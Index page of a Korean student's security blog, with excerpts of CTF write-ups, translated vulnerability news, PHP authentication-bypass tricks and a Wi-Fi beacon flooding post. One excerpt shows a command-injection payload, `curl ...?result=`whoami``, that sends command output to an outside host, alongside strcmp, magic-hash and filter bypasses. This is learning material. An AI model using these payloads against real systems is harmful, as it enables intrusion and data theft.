분류 전체보기
[Docker] - 기본 명령어 사용법
[Docker] - 기본 명령어 사용법
2019.08.10출처 : https://nicewoong.github.io/development/2017/10/09/basic-usage-for-docker/ [Docker] Docker 기본 사용법 정리 - nicewoong Docker 사용법 (Linux에서) Reference 를 보고 직접 따라해본 것을 정리한 내용입니다. Docker 다운받기 curl -s https://get.docker.com/ | sudo sh Docker 사용 권한 주기 docker 는 기본적으로 root 권한이 필요로 되어있다고 함. sudo 명령어 없이 docker를 이요하고 싶다면 아래 커맨드로 사용자에게 권한을 줍시다. sudo usermod -aG docker your-user 그리고나서 nicewoong.github.io 옵션 ..
[보안뉴스] - 이번 블랙햇을 통해 공개될 무료 툴 8가지
[보안뉴스] - 이번 블랙햇을 통해 공개될 무료 툴 8가지
2019.08.09출처: https://www.boannews.com/media/view.asp?idx=81991 [주말판] 이번 블랙햇을 통해 공개될 무료 툴 8가지 전 세계 보안 전문가들이 여름만 되면 가장 기다리는 행사인 블랙햇(Black Hat)과 데프콘(DEF CON)이 코앞으로 바짝 다가왔다. 두 행사가 기다려지는 이유는 새로운 기술들이 대거 발표되기 때문이다. 그런 기술들과 함께 전에 없던 무료 툴들이 공개되는 것도 나름의 전통으로 자리 잡았다. 이번 주 주말판은 올해 블랙햇을 통해 발표될 무료 툴들에 대해 알아보았다. www.boannews.com 1. 피봇스위트(PivotSuite) 레드 팀을 위한 네트워크 피보팅(pivoting) 툴킷이다. 네트워크 피보팅이란 요즘 대유행하는 공격 기술로, 작은 틈새와 ..
[web] - javascript로 unix timestamp 변환하기
[web] - javascript로 unix timestamp 변환하기
2019.08.07근무 시간에도 친구와 톡을 하기 위해 web chatting with telegram bot 을 개발 했었다. 그런데 telegram api를 사용하면 date 값이 unix timestamp 형태로 온다. 이를 변환하기 위해 아래 javascript 코드로 변환을 시켜준다. function unixTimeConvert(unix_timeStamp){ var myDate = new Date( unix_timeStamp *1000); document.write(myDate.toGMTString()+" "+myDate.toLocaleString()); } 다음과 같이 출력이 되는 것을 볼 수 있다.
[TheHackerNews] - ProFTPD에 발견된 Arbitrary file copy (CVE-2019-12815)
[TheHackerNews] - ProFTPD에 발견된 Arbitrary file copy (CVE-2019-12815)
2019.07.28이 글은 영어 공부를 위해 해석된 글 입니다. 독일 보안 연구자들은 가장 유명한 FTP 서버 어플리케이션 중 하나에 심각한 취약점의 새부사항을 공개적으로 밝혔는데, 이는 현재 전세계적으로 백만개 이상의 서버에 사용되어지고 있다. 취약한 소프트웨어는 ProFTPD로, Samba, Slackware, SourceForge를 포함한 웹사이트와 가장 유명한 사업에 사용되는 오픈 소스 FTP 서버이고, Debian과 같은 Unix와 Linux에 사전에 설치되어 있다. Tobias Mädel에 의해 발견되면서, 최약점은 ProFTPD 어플리케이션의 mod_copy 모듈에서 존재하는데, 이 모듈은 유저가 데이터를 클라이언트로 전송할 필요없이 서버의 한 위치에서 다른 위치로 파일 / 디렉토리를 복사 할 수 있다. 드문..
[TheHackerNews] - 리눅스 데스크탑에 새로운 스파이 백도어 Evil Gnome
[TheHackerNews] - 리눅스 데스크탑에 새로운 스파이 백도어 Evil Gnome
2019.07.22본 게시물은 영어 공부 목적으로 번역 된 것 입니다. 보안 연구자들은 모든 주요 안티 바이러스 보안 소프트웨어 제품을 가로질러 현재까지 완진히 탐지되고 있지 않은 희귀한 리눅스 스파이웨어를 발견했고, 대부분 리눅스 멀웨어에 관련하여 보기 드문 기능을 포함하고 있다. 핵심 아키텍쳐와 시장 점유율이 낮기 때문에 전세계에서는 윈도우 바이러스에 비해 변종이나 리눅스 악성코드가 매우 적으며, 그 중 많은 수가 광범위한 기능조차 가지고 있지 않다는 것은 알려진 사실이다. 최근 해에, 리눅스 OS와 소프트웨어에 다양한 종류에서 극심한 치명적인 취약점의 발견으로, 사이버 범죄자들은 그들의 공격을 대부분 이용하는데 실패했다. 대신에, 거대한 양의 멀웨어 타겟인 리눅스 에코 시스템은 재정적인 이득을 위해 암호채굴 공격에 ..
[TheHackerNews] - 해커들은 WhatsApp과 Telegram을 통해 받은 미디어 파일을 조작 할 수 있다.
[TheHackerNews] - 해커들은 WhatsApp과 Telegram을 통해 받은 미디어 파일을 조작 할 수 있다.
2019.07.19이 글은 영어 공부 목적으로 작성되었으며, 해석이 매끄럽지 않을 수도 있습니다.. 만약 당신이 암호화된 안전한 메시지 앱으로 받은 미디어 파일이 조작 될 수 없다라고 생각한다면, 다시 생각해 볼 필요가 있다. Symantec에서 어제 보안 연구자들은 많은 흥미로운 공격 시나리오를 WhatsApp과 telegram 앱으로 입증했는데, 이것은 가짜 뉴스를 퍼트리거나 잘못된 계좌로 지불금을 유저에게 보내어 사기를 치는 악의적인 행위가 가능하다. "Media File Jacking" 이라고 불리는 이 공격은 디바이스에 설치된 어떠한 앱이든 같은 디바이스에 설치된 다른 앱을 통해 저장된 파일을 포함한 외부 저장소에 저장된 파일을 덮어 씌우고 접근 할 수 있다. WhatsApp과 telegram 은 이 앱들이 모든..
[TheHackernews] - 맥 OS용 Zoom Video 회의에 치명적인 원격 코드 실행 취약점
[TheHackernews] - 맥 OS용 Zoom Video 회의에 치명적인 원격 코드 실행 취약점
2019.07.17영어 공부를 목적으로 해석한 것이니, 번역에 문제가 있음을 알려 드립니담... 매우 유명하고 널리 사용되는 Zoom video 회의 소프트웨어에 사생활에 민감한 취약점이 발견되었다. 이 문제는 소프트웨어를 통해 로컬에 설치된 웹서버에 당신의 웹캠 디바이스를 어떤 사이트에서 켜지게 허용되어 있을 뿐만 아니라, 공격자에게 당신의 Apple mac 컴퓨터를 원격으로 완벽한 통제를 가지게 될 수 있다는 것이다. 보고에 따르면, 클라우드 기반인 macOS용 Zoom 회의 플랫폼은 또다른 심각한 결함(CVE-2019-13567)이 발견되었는데, 이것은 사용자에게 일반적인 웹 페이지를 방문하도록 유도 함으로써 타깃인 시스템에 임의의 코드를 실행해 공격자에게 원격을 허락 할 수 있게 한다. Swati khandelwa..
[Hacker101 CTF] Micro-CMS v1
[Hacker101 CTF] Micro-CMS v1
2019.07.15이번 문제의 힌트는 아래와 같다. Flag0 우선 Create a new page 를 클릭하여 글을 등록해보자. 등록하면 아래처럼 글이 등록 된 것을 볼 수 있다. URL을 보면 ~~~/page/14 에서 14의 의미는 아마 필자가 적은 글의 번호 일 것이다. 1 부터 시작해서 값을 늘려가다 보니 7번 글에서 아래 사진처럼 Forbidden 이 출력 된 것을 볼 수 있따. 7번 글을 보기 위해서는 글 수정 기능을 통해 우회가 가능하다 아까 필자가 작성한 13번 글로 가서 Edit this page를 누른다. 그다음 ~~~/page/edit/13 을 ~~~/page/edit/7 로 바꾼다. 아래 사진 처럼 flag 값이 뜬 것을 확인 할 수 있다. Flag1 웹은 서버측으로 인자를 전송할때 그 값을 제대로..
[Hacker101 CTF] - A little something to get you started
[Hacker101 CTF] - A little something to get you started
2019.07.15Hacker 101 CTF A little something to get you started 문제의 힌트는 아래와 같다. 문제 사이트에 들어가면 아래와 같은 문장이 나온다. 개발자 모드 => Network 로 들어가 보니 background.png 파일이 있는 것을 볼 수 있다. 해당 이미지를 보기 위해 url뒤에 /background.png 를 추가한 후 접속해보면 flag 값이 출력 되는 것을 볼 수 있다.
[php] - strcmp를 이용한 취약한 인증절차
[php] - strcmp를 이용한 취약한 인증절차
2019.04.12strcmp 함수는 다들 알다시피 문자열을 비교하여 -1 또는 0 또는 1을 반환하는 함수이다. strcmp('a', 'b') => -1 strcmp('b', 'b') => 0 strcmp('c', 'b') => 1 만약 admin인지 아닌지를 검사하는 코드가 있다고 가정하자. 아래와 같은 결과가 출력이 된다. 위와 같은 코드로 admin인지 문자열을 비교한 후 결과를 출력하게 된다. 만약 비교하는 문자열이 admin이 아니라 다른 값일 경우, 어떻게 strcmp 를 우회 할 수 있을까? 방법은 strcmp 리턴값에 있다. 비교하는 문자열이 어떤 값이든 0으로만 출력하게끔 값을 넣어주면 된다. 아래와 같은 코드를 작성해본 뒤, 접속해보면 이상한 결과가 출력이 된다. test 라는 배열 변수에 이상한 값을..
[php] - register_globals on 취약점
[php] - register_globals on 취약점
2019.04.11이 취약점을 설명하기 전에 php 5.4 버전 이후에서는 동작하지 않는다. 해당 옵션이 사라졌기 때문에 실습을 하고 싶다면 php 5.4 이하의 버전에서 실습을 하기 바란다. ==실습환경== apmsetup 으로 임시 서버를 열어 실습을 진행했다. php 버전은 5.2 이다. php.ini 설정 파일에 register_globals 라는 옵션이 있다. 이 옵션을 on 하게 되면 취약점이 발생하게 된다. register_globals = On 이 옵션을 On 하게 되면 GET 또는 POST 방식 등으로 전될 된 모든 변수가 자동으로 php의 변수로 변환이 된다. 코드를 예로 들어 설명하면 아래와 같다. 위와 같은 코드를 작성하고 웹으로 접근을 해보면 당연히 fail 이라는 문구가 출력이된다. success..
[CTF] - wechall Training: MySQL II 풀이
[CTF] - wechall Training: MySQL II 풀이
2019.04.10http://www.wechall.net/challenge/training/mysql/auth_bypass2/index.php [WeChall] Training: MySQL II MySQL Authentication Bypass II This one is the same as MySQL1, but you have to come up with a more advanced injection to trick this authentication. Your mission is again: Login yourself as admin. Again you are given the sourcecode, also as highlighted vers www.wechall.net 이 문제를 풀다가 괜찮은 문제여서 정리할겸 포..
[Develop] - facebook ctf 점수 배분 자동화 툴
[Develop] - facebook ctf 점수 배분 자동화 툴
2019.04.09facebook ctf 점수 배분 자동화 툴 이란 개발 목적은 Flag 값 공유를 막기 위해 개발하게 되었다. 어떤 문제를 여러명이 풀게 되면 해당 문제의 점수 뿐만 아니라 이 문제를 푼 사람들도 점수가 내려가게끔 개발을 했다. 즉, flag 값을 사람들끼리 공유를 하게 되면 본인 점수도 깎이게 된다는 것이다. How do I use? 위 파일을 다운받고 압축해제 후 fbctfDB.py 파일을 수정해야 한다. 아래 사진을 보면 DB에 접근을 해야하기 때문에 fbctf DB에 접근을 할 수 있는 계정 정보를 수정해 주어야 한다. 실행 방법은 먼저 fbctf의 admin 페이지에서 아래 사진에 나온 버튼(Begin game)을 클릭한다. 그다음, 아래와 같은 명령어로 fbctf_pointManager.py ..
Welcome to blog
Welcome to blog
2019.04.07컴퓨터 보안을 공부중 이고 천문학 분야를 좋아하는 대학생 입니다. 곧 입대 합니다 ^^7. 군바
[Develop] – Chrome Extension Hacking Assistant
[Develop] – Chrome Extension Hacking Assistant
2019.04.07아래 사진을 보면 convert 텝에는 여러가지 변환을 해주는 기능들을 가지고 있다. 왼쪽 입력란에 문자열을 적고, 원하는 기능을 클릭하면 오른쪽에 결과가 출력이 된다. 이번에 새로 추가한 기능인 crypto 기능은 아래와 같다. 문자열을 hash 하는 것은 외부 함수를 가져와서 썼고, decrypto 기능은 어느 웹 사이트에 패킷을 보내 decrypto 한 값을 파싱해서 결과를 출력한다. (현재 decrypt 기능은 동작을 하지 않는다...) 마지막으로 urlParser 이다. 현재 접속한 url 을 가져와 GET 방식 부분만 쉽게 분석하도록 따로 분리하여 아래 사진처럼 출력이 된다. 하지만 현재 버그가 있어서…읍
python을 이용한 beacon flooding attack
python을 이용한 beacon flooding attack
2019.04.06WIFI, 즉 AP기기들은 무선 네트워크 상에서 자신을 알리기 위해 주기적으로 Beacon Frame 패킷을 broadcast로 전송한다. 이와 관련된 정보는 아래 링크를 통해서 알아보자. https://universe-blog.tistory.com/entry/wifi%EA%B0%80-%EB%B3%B4%EB%82%B4%EB%8A%94-beacon-frame-%ED%8C%A8%ED%82%B7-%EB%B6%84%EC%84%9D 불러오는 중입니다... Beacon Flooding Attack Beacon frame 패킷을 이용하여 Beacon 패킷을 주기적으로 보내면 WIFI 목록에는 진짜 AP가 있는 것 처럼 보이게 될 것이다. 이 점을 악용하여 기존의 AP의 MAC 주소와 SSID, channel 등 똑같..
wifi가 보내는 beacon frame 패킷 분석
wifi가 보내는 beacon frame 패킷 분석
2019.04.06이 글은 2019 code gate에서 체험 부스를 보고, 그와 관련된 정보를 찾아 정리한 글이다. 우리는 스마트 폰이나 노트북으로 인터넷을 하기 위해 WIFI를 찾는다. 그런데 우리 주변에 WIFI의 존재와 WIFI의 이름, 신호세기 등을 어떻게 아는 것인가? Beacon Frame Beacon Frame은 무선 네트워크 속에서 자신을 알리고, 무선 네트워크에 참여 할 수 있도록 broadcast로 주기적으로 전송하는 패킷이다. 이러한 패킷 때문에 우리는 장비들을 통해 주변의 WIFI의 존재 유무를 알 수 있게 된다. Beacon frame 패킷안에는 AP의 SSID, Channel, 암호화, 전송률 등이 포함되어 있다. 여기서 AP는 WIFI와 같다고 생각하면 되고, SSID는 SubSystem Id..
[Network] – tcp 연결 분석
[Network] – tcp 연결 분석
2019.04.06[TCP 란?] 전송 제어 프로토콜(Transmission Control Protocol) 인터넷에 연결된 컴퓨터 간의 정보 를 안정적이고 순서대로, 에러없이 교환할 수 있게 한다. 연결 및 데이터 전송을 하기 위해 3 way handshake와 연결 종료를 위해 4 way handshake를 한다. 안정성을 필요로 하지 않을 경우 TCP 대신 UDP(User Datagram Protocol)을 사용한다. UDP의 예로는 인터넷 방송 등이 있다. [3-way-hand-shake] 3wayhandshake는 client가 server에 요청하고 server에게 데이터를 받기 위해 신뢰성 연결을 하게 된다. client가 Server에게 SYN(a) 패킷을 보낸다. 이때 a는 Sequence Number를 ..
[System] – 리눅스 백쿼터 (back quote) with curl
[System] – 리눅스 백쿼터 (back quote) with curl
2019.04.06백 쿼터 (` `) 백 쿼터 안에 있는 문자열을 명령어로 인식하게 만든다. 예를 보면서 이해해보자. 이걸 적는 이유는 ctf 문제 때문이다. admin.php 에 get 방식으로 cmd 라는 변수로 vaule를 넘기면 system 함수를 실행하는 문제였다. (실제로 문제 소스 코드는 저렇지 않았다.) 이 문제가 SSRF 취약점을 이용하는 문제였다. 서버가 클라이언트에게 요청을 보내는 방법에서 발생한 취약점인데, 아래 처럼 curl 과 백 쿼터를 이용하여 써먹을 수 있다. Attacker 가 value 를 curl https://univ-blog.xyz/?result=`whoami` 라고 보내게 되면 server에서 백 쿼터로 감싸여 있는 whoami 명령어를 실행한 후 그 출력 값을 result 라는 변..
HackingCamp 2019 CTF 후기
HackingCamp 2019 CTF 후기
2019.04.06HackingCamp 에는 참가를 하지 않았지만, CTF만 외부에서 참가했다. 문제 분야는 web, reversing, pwnable, porensic, misc, network, crypto, programming 이렇게 있다. web에서 usersearch 문제와 pwnable, revering을 제외한 모든 문제를 풀었다. reversing이랑 pwnable은 실력이 안되서…. 목표는 10등 안에 들기 였지만, 무리였나보다.
[HackingCamp 2019] – Plz Solveme write up
[HackingCamp 2019] – Plz Solveme write up
2019.04.06webhacking => Plz Solveme 위 파일을 다운받고 run.py 라는 파일의 소스코드를 보면 GET 방식으로 exp 라는 변수의 값을 받게 된다. # flag in /flag from flask import Flask, render_template, request, session, redirect, url_for from multiprocessing import Process import re import time import shutil import tempfile app = Flask(__name__) FLAG = 'flag is HCAMP{flag in real server, this is not flag}' @app.route('/', methods=['GET']) def main(..
[HackingCamp 2019] – what the hash write up
[HackingCamp 2019] – what the hash write up
2019.04.06web hacking => What The Hash (현재 이 글을 쓰는 시점에는 해당 문제 서버에 접속을 할 수 없는 상태이기 때문에 소스코드로만 설명을 하겠다.) 첫번째 문제의 소스는 아래와 같다. 암호화된 문자열을 md5로 복호화 하면 ‘hash’ 라는 단어가 나온다. GET 방식으로 ?hash=hash 라고 보내면 첫번째 문제는 풀린다. 두번째 문제이다. 이 문제는 magic hash 문제이다. 암호화된 문자열을 보면 0e 라고 시작하는 것을 볼 수 있다. 0e123는 수학으로 보면 0 * 10^123 = 0 이라고 볼 수 있다. 언어에서는 auto casting을 하고 php 는 int 를 비교하는 것을 선호하기 때문에 md5로 hash 했을때 0e 로 시작하는 값이 나오게끔 240610708 ..
[HackingCamp 2019] – admin write up
[HackingCamp 2019] – admin write up
2019.04.06web hacking => admin id를 입력하는 공간이 있다. admin을 입력하니 Hello 라고 출력이 되었다. guest 라고 입력하니 Hello guest 라고 출력이 되었다. 여기서 알 수 있는 것은 admin을 입력했을때 admin 이라는 값은 필터링 되어 버린다는 것을 알 수 있다. 여러 값을 입력해본 결과 admin => ” admi => ” 을 필터링 한다는 것을 알 수 있었다. 따라서 adadmimin 이라고 입력하면 flag 값이 나오게 된다. HCAMP{rls1004_is_so_cute_>_
[HackingCamp 2019] – 더 풀래구 줴눼뤠위퉈 write up
[HackingCamp 2019] – 더 풀래구 줴눼뤠위퉈 write up
2019.04.06MISC => 더 풀래구 줴눼뤠위퉈 우선 nc 로 접속하면 아래와 같이 실행이 된다. 어떤 값을 입력하면 flag 값과 flag check 값이 출력이 된다. 여기서 입력값은 예시 처럼 {“0” : 53} 이런 식으로 json 타입으로 입력을 해야 한다는 것이다. 이번 문제는 친절하게 소스코드를 올려 주었기 때문에, 위 파일의 소스 코드를 열어 보면 다음과 같다. #!/usr/bin/python3 # -*- coding: utf-8 -*- import json import string character_list = string.ascii_letters + string.digits + "_@" len_character_list = len(character_list) class FlagGenerator():..
[HackingCamp 2019] – 아아 뫄위쿠 퉤수투 write up
[HackingCamp 2019] – 아아 뫄위쿠 퉤수투 write up
2019.04.06MISC => 아아 뫄위쿠 퉤수투 위 파일을 다운 받으면 암호화된 문자열을 볼 수 있다. python 으로 base64 decode 툴을 만들어서 실행 해본 결과 flag를 얻어 낼 수 있었다. import base64 f = open('test.txt','r') data = f.read() while True: data = data.replace('\n','') data = base64.b64decode(data).decode('utf-8') if 'HCAMP' in data: print(data) break # Result # HCAMP{B4se_64_x_30_@@_XD} HCAMP{B4se_64_x_30_@@_XD}
[HackingCamp 2019] – Fun Game write up
[HackingCamp 2019] – Fun Game write up
2019.04.06MISC => Fun Game 요즘 CTF에서 스타 맵 문제가 유행인가 보다. scx 파일은 스타1 맵 파일이다. 스타1 유즈맵을 만들어본 사람으로써, “트리거”에 flag를 숨겼을 것 같아 확인 해본 결과 flag 값이 들어 있었다. HACMP{StarCraft_1s_Funfunnnnnnnnnnnnnnnnnn““““““} 오랜만에 이 유즈맵을 봐서 너무 반가웠다. 나중에 친구랑 해야지
[HackingCamp 2019] – Where write up
[HackingCamp 2019] – Where write up
2019.04.06MISC => Where….?!?!? 위 파일을 다운 받으면 어떤 장소에서 찍은 사진이 하나 주어진다. 스테가노그래피 인줄 알고 막 삽질 했지만 의미 없는 짓이었다. 그냥 해당 사진에 있는 가게 이름을 검색하여 찾아 보았지만, 나오지 않았다. 동아리 회장 도움을 받아, ‘오레시피’ 라는 가게 이름을 검색하자 주소가 나왔다. https://m.blog.naver.com/PostView.nhn?blogId=5sa11&logNo=221197985361&proxyReferer=https%3A%2F%2Fwww.google.com%2F HCAMP{dnjfemzjqqnrfh54rlf}
[HackingCamp 2019] – 나는 언젠가 플래그를 보았다. write up
[HackingCamp 2019] – 나는 언젠가 플래그를 보았다. write up
2019.04.06Network => 나는 언젠가 플래그를 보았다. 위 파일을 다운 받으면 pcap 이라는 확장자를 가진 것을 볼 수 있다. Wireshark 로 해당 파일을 열어보자. 문제 이름을 보면 ‘나는 플래그를 보았다.’ 라고 되어 있다. 의미를 해석하면, 문제 제작자는 플래그를 보았다 라는 의미로 해석되는데 이 pcap 파일 어딘가에 flag 파일이 들어 있다는 것이다. 나는 이런 문제가 나오면 무조건 처음으로 하는 방법은 Export Http 기능을 사용한다. 이 기능은 HTTP를 이용하여 주고받은 파일들을 목록으로 나열하여 유저에게 보여주는 기능이다. 아래 사진처럼 많은 파일들이 나오게 되는데, 모두 저장하여 필요한 파일이 있는지 확인한다. 저장된 파일을 보는 도중에, flag.xps 라는 파일이 있는 것을..
[HackingCamp 2019] – You_Must_Logoff write up
[HackingCamp 2019] – You_Must_Logoff write up
2019.04.06Forensic => You_Must_Logoff https://drive.google.com/open?id=19p1Nqf5hTxB7XHHBETJDwcGm673U1D_f 위 구글 공유 파일이 살아 있다면 다운 받도록 하자. 위 파일을 다운 받고 FTK Imager 툴로 분석을 했다. 포렌식 문제는 몰라서 동방에 있는 포렌식 잘하는 후배에게 도움을 받아 분석을 시작했다. 위 파일을 열면 FTK Imager에 아래와 같이 나온다. 문제를 다시 읽어보면 ‘의심 계정’, ‘Backdoor’ 를 찾는 것이다. 현재 os에서 계정을 보기 위해 home 디렉토리를 보면 5개의 계정이 존재하는 것을 알 수 있다. (여기서 backdoor를 찾는데 시간좀 걸림..) 삽질은 버리고 풀이만 보면 Waterman이라는 디렉토..
[HackingCamp 2019] 태보의 저주 write up
[HackingCamp 2019] 태보의 저주 write up
2019.04.06Forensic => 태보의 저주 요즘 ctf에서 태보라는 단어가 유행인가 보다. 노래를 듣고 약간 충격을 받았지만.. hxd로 실행해서 flag 값을 찾아 봤지만 없었다. 혹시 steganographic 기법으로 wav 파일에 text로 flag를 숨겼는지 확인하기 위해 아래 사이트를 이용했다. https://futureboy.us/stegano/decinput.html 위 사이트에 wav 파일을 업로드하고 기다리니 flag값이 나왔다. HCAMP{taebo_hae!}